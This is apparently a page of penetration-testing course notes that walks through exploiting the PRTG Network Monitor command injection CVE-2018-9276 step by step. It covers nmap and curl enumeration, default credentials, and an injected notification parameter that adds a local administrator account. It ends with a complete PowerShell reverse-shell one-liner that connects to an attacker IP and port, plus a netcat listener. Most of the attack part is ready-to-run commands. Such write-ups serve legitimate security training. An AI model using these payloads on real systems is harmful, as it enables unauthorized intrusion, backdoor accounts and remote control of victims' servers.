13.Prtg-network-monitor

Introduction

This section details how to exploit PRTG Network Monitor, specifically focusing on CVE-2018-9276, an authenticated command injection vulnerability. The following steps guide the exploitation process:

1. Discovery and Enumeration

Nmap Scan

Use Nmap to scan all TCP ports and identify service versions:

sudo nmap -sV -p- --open -T4 10.129.201.50

Look for port 8080 with "Indy httpd 17.3.33.2830 (Paessler PRTG bandwidth monitor)."

EyeWitness Scan

EyeWitness may reveal default credentials (prtgadmin:prtgadmin).

cURL Version Check

Retrieve the PRTG version from the web page's source code:

curl -s http://10.129.201.50:8080/index.htm -A "Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)" | grep version

2. Exploiting CVE-2018-9276 (Authenticated Command Injection)

Login

Attempt to log in with default or discovered credentials (prtgadmin:Password123).

Navigate to Notifications

  • Go to Setup -> Account Settings -> Notifications in the PRTG web interface.

Add a New Notification

  1. Click Add new notification.

  2. Name the notification (e.g., pwn).

  3. Scroll down and check EXECUTE PROGRAM.

  4. In Program File, select Demo exe notification - outfile.ps1.

  5. In the Parameter field, enter the command injection payload:

test.txt;net user prtgadm1 Pwn3d_by_PRTG! /add;net localgroup administrators prtgadm1 /add

  1. Click Save.

Test Notification

  • On the Notifications page, click the Test button for the newly created notification.

  • A popup will say EXE notification is queued up.

3. Verification

Using CrackMapExec (SMB)

Check if the new user has local admin access:

sudo crackmapexec smb 10.129.201.50 -u prtgadm1 -p Pwn3d_by_PRTG!

Alternative Verification Methods

  • Try logging in via RDP, WinRM, or using:

    • evil-winrm

    • wmiexec.py

    • psexec.py (from the Impacket toolkit)

4. Reverse Shell (Alternative Payload)

Instead of adding a user, execute a PowerShell reverse shell:

test.txt;powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Start Netcat Listener

On your attack machine:

nc -lvp 4444

Key Points

  • Replace 10.129.201.50 with the target IP address.

  • Modify 10.10.14.15:4444 to match your attacker's IP and port.

  • Use semicolons (;) to separate commands in the payload.

  • Ensure the target PRTG version is vulnerable (before 18.2.39).

  • PowerShell execution policies may block scripts—consider bypass techniques.

  • Always test on systems where you have explicit permission.

Previous12.-Attacking-splunkNext4. Customer Service Mgmt & Configuration Management

Last updated